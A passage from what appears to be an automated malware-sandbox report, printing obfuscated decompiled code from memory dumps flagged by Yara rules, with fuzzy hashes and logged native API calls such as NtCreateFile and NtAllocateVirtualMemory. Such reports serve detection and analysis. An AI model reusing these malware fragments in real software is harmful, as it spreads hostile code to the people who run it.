                                        					 *0x7a0d8ba2 =  *0x7a0d8ba2 - 0x3cc14109;
                                        					_t33 = _t33 + 1;
                                        					asm("sbb [0x3644e3a0], ch");
                                        					asm("adc al, [0xc626bb6]");
                                        				} else {
                                        					asm("adc eax, [0xd188277a]");
                                        					_pop(__edx);
                                        					__esp = __esp - 0xe7554ade;
                                        					__eflags =  *0x2cc5ce17 & __edx;
                                        					__eax = __eax -  *0x17f6783b;
                                        					__dl = __dl | 0x000000f6;
                                        					__ebx = __ebx | 0x3d8d226e;
                                        					__eflags = __ebx;
                                        					__esi = __esp;
                                        					if(__ebx < 0) {
                                        						goto L1;
                                        					} else {
                                        						__esp = __esp &  *0x9e1eff72;
                                        						__edx = __edx |  *0xdb10c21;
                                        						__edx = __edx ^  *0x910f108c;
                                        						__eflags = __edx -  *0xac8db637;
                                        						 *0x37fee6f5 =  *0x37fee6f5 >> 0xa1;
                                        						__edi = __edi & 0x60b93b2b;
                                        						__ecx = __ecx -  *0xc20d54d6;
                                        						asm("rcl dword [0x91cf16e], 0x3a");
                                        						 *0x3847092a =  *0x3847092a & __cl;
                                        						__ecx = __ecx +  *0xc624f15;
                                        						 *0x4b5f4d8f =  *0x4b5f4d8f << 0x71;
                                        						__eflags = __ebp -  *0x1f7060bf;
                                        						__esi = 0xe6d296ff;
                                        						 *0xe1111018 =  *0xe1111018 - __al;
                                        						 *0x47a83339 = __ecx;
                                        						asm("sbb ch, [0x57a8f7b7]");
                                        						__ebx = __ebx |  *0x61121223;
                                        						__edx = __edx &  *0xd22a9526;
                                        						asm("rcr dword [0x9b60ef6e], 0x52");
                                        						 *0x58aa1a8f =  *0x58aa1a8f >> 0xb4;
                                        						asm("adc esi, [0x8f72416e]");
                                        						__eax = __eax - 1;
                                        						_push( *0xdd6ab027);
                                        						asm("adc esi, 0x332c9b9c");
                                        						__eflags =  *0xc70b7005 & __ebx;
                                        						__ebp = __ebp -  *0x7bfcfb8;
                                        						_push( *0xd1fd736);
                                        						asm("cmpsw");
                                        						 *0xd7b7406d =  *0xd7b7406d & __ebp;
                                        						_t11 = __ebp;
                                        						__ebp =  *0x47f8216e;
                                        						 *0x47f8216e = _t11;
                                        						asm("sbb bh, [0x624f1538]");
                                        						__esi = 0xe6d296ff +  *0x5086d10e;
                                        						__eflags = 0xe6d296ff;
                                        						if(0xe6d296ff != 0) {
                                        							goto L1;
                                        						} else {
                                        							_t12 = __eax;
                                        							__eax =  *0x4029b775;
                                        							 *0x4029b775 = _t12;
                                        							__esp = __esp ^ 0x7b436c15;
                                        							 *0xe4ba563 =  *0xe4ba563 | __ch;
                                        							__eflags =  *0x1febb05 & 0xe6d296ff;
                                        							_pop(__edi);
                                        							asm("adc esp, [0x6421ce09]");
                                        							__ebx = __ebx + 1;
                                        							__eflags = __ebx;
                                        							if(__ebx != 0) {
                                        								goto L1;
                                        							} else {
                                        								asm("rcl dword [0x4ba5637b], 0x2f");
                                        								 *0x55459711 =  *0x55459711 ^ __ebp;
                                        								__edi = __edi - 1;
                                        								asm("rcr byte [0x15ba25b1], 0x43");
                                        								__eax = __eax & 0x4fa82568;
                                        								asm("movsb");
                                        								__bh = __bh - 0x86;
                                        								_t15 = __ebx;
                                        								__ebx =  *0xd2f2d19;
                                        								 *0xd2f2d19 = _t15;
                                        								__ebp = __ebp |  *0x882a98d5;
                                        								__edi = __edi + 1;
                                        								 *0x624f1538 = __al;
                                        								__ebx =  *0xd2f2d19 +  *0xaae9fb1d;
                                        								__dl = 0;
                                        								__ecx = __ecx - 0xb95d98fc;
                                        								__eflags =  *0x9b6d9de2 & __ah;
                                        								__eflags = __edx;
                                        								if(__eflags != 0) {
                                        									goto L1;
                                        								} else {
                                        									__esp =  *0xd0e31d7b;
                                        									__ecx = 0x8c83ae35;
                                        									if(__eflags < 0) {
                                        										goto L1;
                                        									} else {
                                        										asm("rcr dword [0xf7881672], 0xb5");
                                        										if(__eflags < 0) {
                                        											goto L1;
                                        											do {
                                        												do {
                                        													do {
                                        														goto L1;
                                        													} while (_t21 !=  *0xf205cdb5);
                                        													_t35 = _t35 +  *0xcf63b7b;
                                        													_t22 = _t22 +  *0x77da6d88;
                                        													 *0xe6035f64 =  *0xe6035f64 ^ _t35;
                                        													asm("adc dl, 0x8");
                                        												} while ( *0xe6035f64 >= 0);
                                        												asm("adc edi, 0xe2bbec73");
                                        												asm("adc [0xc9901399], ebx");
                                        												 *0x660d6abc =  *0x660d6abc - _t36;
                                        												_push(0x3cc14109);
                                        												_t36 = _t36 &  *0x4fb89bf0;
                                        												_t22 =  *0x13625927;
                                        												 *0x25ac2593 =  *0x25ac2593 >> 0x89;
                                        												 *0x1d63b395 =  *0x1d63b395 ^ _t38;
                                        											} while (0x3cc1410a <= 0);
                                        											 *0x310136c9 =  *0x310136c9 << 0x39;
                                        											asm("sbb ebp, [0xd839c0c5]");
                                        											return _t21;
                                        										} else {
                                        											asm("rol dword [0x397a1778], 0x7");
                                        											__ebp = __ebp &  *0x5e7d3ddc;
                                        											 *0x6ed9a4e1 = __esp & 0x939fec1b;
                                        											__esi = __esi ^  *0x6aad206e;
                                        											__ebx = __ebx - 1;
                                        											__esp = __esp - 1;
                                        											asm("sbb [0xd30d1084], cl");
                                        											asm("adc [0xc4c36fb1], cl");
                                        											__ebp = 0x47fd3468;
                                        											__dl = 0x00000000 ^  *0x624f1538;
                                        											__eflags = 0x00000000 ^  *0x624f1538;
                                        											asm("sbb ecx, [0x3a616717]");
                                        											__ecx =  *0x5595f789;
                                        											 *0x5595f789 = 0x8c83ae35;
                                        											return __eax;
                                        										}
                                        									}
                                        								}
                                        							}
                                        						}
                                        					}
                                        				}
                                        			}











                                        Memory Dump Source
                                        • Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0aa443f26d21b1cf1824d85f6181349ac30f1e47b0321ee6cec59b9f07b0a996
                                        • Instruction ID: 712df88c8885b60a761b9e0b7639f84878db7abd8993efe8bb25c3317e7db315
                                        • Opcode Fuzzy Hash: 0aa443f26d21b1cf1824d85f6181349ac30f1e47b0321ee6cec59b9f07b0a996
                                        • Instruction Fuzzy Hash: 74617A72A44790CFDB16DF3CED96B427FB2F796324B09024EC9A153196D3342566CB88
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00401030(signed char* __eax) {
                                        				signed char* _t37;
                                        				unsigned int _t65;
                                        				unsigned int _t73;
                                        				unsigned int _t81;
                                        				unsigned int _t88;
                                        				signed char _t94;
                                        				signed char _t97;
                                        				signed char _t100;
                                        
                                        				_t37 = __eax;
                                        				_t65 = ((((__eax[0xc] & 0x000000ff) << 0x00000008 | __eax[0xd] & 0x000000ff) & 0x0000ffff) << 0x00000008 | __eax[0xe] & 0xff) << 0x00000007 | (__eax[0xf] & 0x000000ff) >> 0x00000001;
                                        				_t94 = __eax[0xb];
                                        				if((_t94 & 0x00000001) != 0) {
                                        					_t65 = _t65 | 0x80000000;
                                        				}
                                        				_t37[0xc] = _t65 >> 0x18;
                                        				_t37[0xf] = _t65;
                                        				_t37[0xd] = _t65 >> 0x10;
                                        				_t73 = ((((_t37[8] & 0x000000ff) << 0x00000008 | _t37[9] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[0xa] & 0xff) << 0x00000007 | (_t94 & 0x000000ff) >> 0x00000001;
                                        				_t97 = _t37[7];
                                        				_t37[0xe] = _t65 >> 8;
                                        				if((_t97 & 0x00000001) != 0) {
                                        					_t73 = _t73 | 0x80000000;
                                        				}
                                        				_t37[8] = _t73 >> 0x18;
                                        				_t37[0xb] = _t73;
                                        				_t37[9] = _t73 >> 0x10;
                                        				_t81 = ((((_t37[4] & 0x000000ff) << 0x00000008 | _t37[5] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[6] & 0xff) << 0x00000007 | (_t97 & 0x000000ff) >> 0x00000001;
                                        				_t100 = _t37[3];
                                        				_t37[0xa] = _t73 >> 8;
                                        				if((_t100 & 0x00000001) != 0) {
                                        					_t81 = _t81 | 0x80000000;
                                        				}
                                        				_t37[4] = _t81 >> 0x18;
                                        				_t37[7] = _t81;
                                        				_t37[5] = _t81 >> 0x10;
                                        				_t88 = (((_t37[1] & 0x000000ff) << 0x00000008 | _t37[2] & 0x000000ff) & 0x00ffffff | ( *_t37 & 0x000000ff) << 0x00000010) << 0x00000007 | (_t100 & 0x000000ff) >> 0x00000001;
                                        				 *_t37 = _t88 >> 0x18;
                                        				_t37[1] = _t88 >> 0x10;
                                        				_t37[6] = _t81 >> 8;
                                        				_t37[2] = _t88 >> 8;
                                        				_t37[3] = _t88;
                                        				return _t37;
                                        			}












                                        Memory Dump Source
                                        • Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                        • Instruction ID: 9ce4faf4bd6c29c48d5e9242fd1ccb7de96948774e055271f7c113e60250bd75
                                        • Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                        • Instruction Fuzzy Hash: 203180116596F10ED30E836D08BDA75AEC18E9720174EC2FEDADA6F2F3C0888408D3A5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e6c453a4afec2cbeb275a449c49ec4fe2fe0d737f2d4308d86657a89f548aa45
                                        • Instruction ID: 6a1e3bd19362642cdeaeda891220920f01aabeac24d4a2725a8d8fb4f8384514
                                        • Opcode Fuzzy Hash: e6c453a4afec2cbeb275a449c49ec4fe2fe0d737f2d4308d86657a89f548aa45
                                        • Instruction Fuzzy Hash: BEC08C02E2A102014A220A1CAC814F0F7A8918703880063C2E814333449043D42005DA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 37%
                                        			E00407AFB(void* __edi) {
                                        
                                        				asm("adc eax, [ss:ebp+0x3f1c5e66]");
                                        				return 1;
                                        			}



                                        0x00407afc
                                        0x00407b1a

                                        Memory Dump Source
                                        • Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 106fd65f005b6c10de70964aacc8c844fe8b941deffd990d873677b3f2880be3
                                        • Instruction ID: 2136b1a75945695752618d0f582d1b2d73e605b7700c0ad20a98be9a2538685e
                                        • Opcode Fuzzy Hash: 106fd65f005b6c10de70964aacc8c844fe8b941deffd990d873677b3f2880be3
                                        • Instruction Fuzzy Hash: 85C08C32A1500E8AEA20CC0CF8816F4F3E8EB4632CF082297D808A32008082D4960258
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Executed Functions

                                        APIs
                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,03214B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,03214B87,007A002E,00000000,00000060,00000000,00000000), ref: 03219DAD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID: .z`
                                        • API String ID: 823142352-1441809116
                                        • Opcode ID: 00b872a2f08bdf8bbf328021e9f9b12229bb7762afb927f494f6b9f664d87a02
                                        • Instruction ID: 8f62fd804dbb24a8a6c98f8bc78f4fdcb4d278b53c964c8c0cff2b2f07d7e95f
                                        • Opcode Fuzzy Hash: 00b872a2f08bdf8bbf328021e9f9b12229bb7762afb927f494f6b9f664d87a02
                                        • Instruction Fuzzy Hash: EB01B6B6215108AFCB48CF98DC84DEB37EEEF8C754F158248BA1DD7250D630E8518BA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,03214B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,03214B87,007A002E,00000000,00000060,00000000,00000000), ref: 03219DAD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID: .z`
                                        • API String ID: 823142352-1441809116
                                        • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                        • Instruction ID: 8d6104beb54ebfb81c373189ce763fe65c13db7aa96895e5aa90bf80b5af539e
                                        • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                        • Instruction Fuzzy Hash: 00F0B2B2211208ABCB08CF88DC84EEB77EDAF8C754F158248BA0D97240C630E8518BA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • NtReadFile.NTDLL(03214D42,5EB6522D,FFFFFFFF,03214A01,?,?,03214D42,?,03214A01,FFFFFFFF,5EB6522D,03214D42,?,00000000), ref: 03219E55
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                        • Instruction ID: 1a528665509752b2071755acb7cbbd52646f0af6746beba2aa0d2af45128c32b
                                        • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                        • Instruction Fuzzy Hash: F1F0A4B6210208ABCB14DF89DC80EEB77ADEF8C754F158248BA1DA7241D630E8518BA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,03202D11,00002000,00003000,00000004), ref: 03219F79
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateMemoryVirtual
                                        • String ID:
                                        • API String ID: 2167126740-0
                                        • Opcode ID: 844f2b00d9e26735b9789c95e41092d375dc6f3a3d251b35ce7d0d150660873b
                                        • Instruction ID: fb5f6a3f64968b8e3e03d9f6654ac914cfd0a08618301b96d5268c4ef142c943
                                        • Opcode Fuzzy Hash: 844f2b00d9e26735b9789c95e41092d375dc6f3a3d251b35ce7d0d150660873b
                                        • Instruction Fuzzy Hash: 65F01CB6200249BFCB14DF98CC81EEB7BA9EF9C354F158158FA4C97241C630E961CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,03202D11,00002000,00003000,00000004), ref: 03219F79
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateMemoryVirtual
                                        • String ID:
                                        • API String ID: 2167126740-0
                                        • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                        • Instruction ID: c76d9174ad205ddcf51d4c9d3e87efc9a229855e096f35872d3da5f43cc202aa
                                        • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                        • Instruction Fuzzy Hash: 80F015B6210208ABCB14DF89CC80EAB77ADEF88650F118148BE08A7241C630F810CBE0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • NtClose.NTDLL(03214D20,?,?,03214D20,00000000,FFFFFFFF), ref: 03219EB5
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: Close
                                        • String ID:
                                        • API String ID: 3535843008-0
                                        • Opcode ID: e9a9820e81e42be31f3a07556a1d077fe0e7c1c277b895f5d19580ece4d098da
                                        • Instruction ID: 60642f08d3599b898509dac73b89b75c670905004c5becce8094946dc6fadb1e
                                        • Opcode Fuzzy Hash: e9a9820e81e42be31f3a07556a1d077fe0e7c1c277b895f5d19580ece4d098da
                                        • Instruction Fuzzy Hash: 44E0C2352003047FD720EFA8CC85EE77BACEF44660F094499BA4C6B242C530FA5087E0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • NtClose.NTDLL(03214D20,?,?,03214D20,00000000,FFFFFFFF), ref: 03219EB5
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: Close
                                        • String ID:
                                        • API String ID: 3535843008-0
                                        • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                        • Instruction ID: 680a74885e460dbe76731d57847a1e0d517e50cc824b1cd05d929e777bbb318e
                                        • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                        • Instruction Fuzzy Hash: 50D012752003146BD710EB98CC85E9777ACEF44660F154455BA5C5B241C570F55086E0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 6138274e3d8b980cd59c6d644c577dd277f5776323af4b839e513de1dbf23fd4
                                        • Instruction ID: 8219dc851c34bb9668d61aaf9e2b543211d6dffe4c5d482e7cace6502ed0936a
                                        • Opcode Fuzzy Hash: 6138274e3d8b980cd59c6d644c577dd277f5776323af4b839e513de1dbf23fd4
                                        • Instruction Fuzzy Hash: 839002B520101402D14071594444756005597D0381F91C425A9095558E86998DD576A5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: a2c48b1ff7e3fbaad6ad60d94714d80f9e601286521f58a2d05027694747adfd
                                        • Instruction ID: 218c94c7e15cb5d6e982025e3dd129b6a82acc8ecfb9e39f9b37715f532e4619
                                        • Opcode Fuzzy Hash: a2c48b1ff7e3fbaad6ad60d94714d80f9e601286521f58a2d05027694747adfd
                                        • Instruction Fuzzy Hash: FC90047D311010030105F55D074451700D7D7D53D13D1C435F5047554CD771CC717171
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 5eeae9d816c924b698396be37cb9758f9f77e85fef0717237ec082f6f15272bd
                                        • Instruction ID: eea0cfc008881a8402c4994775e73938abb8c6c1d71309215289ceab380067b9
                                        • Opcode Fuzzy Hash: 5eeae9d816c924b698396be37cb9758f9f77e85fef0717237ec082f6f15272bd
                                        • Instruction Fuzzy Hash: 6B9002A534101442D10061594454B160055D7E1381F91C429E5095558D8659CC527166
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 46e8003e8121a462c48f787c73a6ceaebd6a141e1341b663c12816e2759b3e0a
                                        • Instruction ID: 82f345d66569a66bf3d1243b2ca1fdfc0cdf74c222da93c1ef47de6e89adb20f
                                        • Opcode Fuzzy Hash: 46e8003e8121a462c48f787c73a6ceaebd6a141e1341b663c12816e2759b3e0a
                                        • Instruction Fuzzy Hash: 259002A520201003410571594454626405A97E0281B91C435E5045594DC56588917165
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: f12eb281a489ecc71c5ccdcedacb844219476e95ec80d29bb685751127216217
                                        • Instruction ID: 00245da6820e83f815b131788ef276efa56f6d615c6506390bae8acc5cc7b38c
                                        • Opcode Fuzzy Hash: f12eb281a489ecc71c5ccdcedacb844219476e95ec80d29bb685751127216217
                                        • Instruction Fuzzy Hash: 0390027520101413D11161594544717005997D02C1FD1C826A445555CD96968952B161
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 2e26ad78943fda637cb09ef7bd17d16912bb2a26713f2380c96571f32692328f
                                        • Instruction ID: 3d38c79dfbdfd747fe1558c0421e077bfc297ab2c88bc5dff485e7be35ba9424
                                        • Opcode Fuzzy Hash: 2e26ad78943fda637cb09ef7bd17d16912bb2a26713f2380c96571f32692328f
                                        • Instruction Fuzzy Hash: 6C900265242051525545B15944445174056A7E02C17D1C426A5445954C85669856E661
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: cb366ec2d8c910929c9e03648726f51441c21b674ddb07a1a7b9abff510693a5
                                        • Instruction ID: b19118ffb1be45b6dd38c7e23e4a4a381420195940a82024b77aad6eb53fcda5
                                        • Opcode Fuzzy Hash: cb366ec2d8c910929c9e03648726f51441c21b674ddb07a1a7b9abff510693a5
                                        • Instruction Fuzzy Hash: FE90027520101402D10065995448656005597E0381F91D425A9055559EC6A588917171
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 5fd7e6f318dd58baf176cc283f228f562bfd3b22ad01a9bcd6adb4986ff685ab
                                        • Instruction ID: 575f9f7dfde5aded7c9a8b9e785c1e11e48fdf8e48bc71ebda3740f0e36ba83d
                                        • Opcode Fuzzy Hash: 5fd7e6f318dd58baf176cc283f228f562bfd3b22ad01a9bcd6adb4986ff685ab
                                        • Instruction Fuzzy Hash: F790026D21301002D1807159544861A005597D1282FD1D829A404655CCC95588696361
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 368d9e826a6a264db246f425faaea43e4df5c27917547527d7bd116ad5ab6ebc
                                        • Instruction ID: 0c36b4c31fdc1f582b63b24ce49992ea7fb19ea2ed4b81df471b3e71a158882e
                                        • Opcode Fuzzy Hash: 368d9e826a6a264db246f425faaea43e4df5c27917547527d7bd116ad5ab6ebc
                                        • Instruction Fuzzy Hash: 7390027531115402D11061598444716005597D1281F91C825A485555CD86D588917162
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: a8a90d8ed1c75b74be2a7ea170133bb01d5dd9c70e56539fe3e13c6b8186f076
                                        • Instruction ID: c26b4d6e5ac1c8ffcdedffa4f012ad4af189b8c15bc2db47daf4691b92d59276
                                        • Opcode Fuzzy Hash: a8a90d8ed1c75b74be2a7ea170133bb01d5dd9c70e56539fe3e13c6b8186f076
                                        • Instruction Fuzzy Hash: FD90027520101802D1807159444465A005597D1381FD1C429A4056658DCA558A5977E1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 1b7b67085bcf823f59cf6d77da9373675b227839d7abfcc15e47e4910e827d20
                                        • Instruction ID: 65e0a8f0d540f187e951663abe20e8b3ec81c89af60c89d4455701c2120f4f64
                                        • Opcode Fuzzy Hash: 1b7b67085bcf823f59cf6d77da9373675b227839d7abfcc15e47e4910e827d20
                                        • Instruction Fuzzy Hash: 4790026521181042D20065694C54B17005597D0383F91C529A4185558CC95588616561
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 2cdd1cda06f762cb6cf9879a32d2ce45dc782e035654ec4caee18801da234b3c
                                        • Instruction ID: c447b59bff00cc559dfad1e5658c215bdbc6a75b7ddd55104f4dc75b093c5624
                                        • Opcode Fuzzy Hash: 2cdd1cda06f762cb6cf9879a32d2ce45dc782e035654ec4caee18801da234b3c
                                        • Instruction Fuzzy Hash: D690027520505842D14071594444A56006597D0385F91C425A4095698D96658D55B6A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 28f96a9bfd95f16f09c0ef3793f150a87442d2f949bf9fc44c209eb2efdc2fcf
                                        • Instruction ID: 25dbc0059d0c6aa4b52db5fb23bd48e0938e16a196e9c29881ade8a88cb42b4f
                                        • Opcode Fuzzy Hash: 28f96a9bfd95f16f09c0ef3793f150a87442d2f949bf9fc44c209eb2efdc2fcf
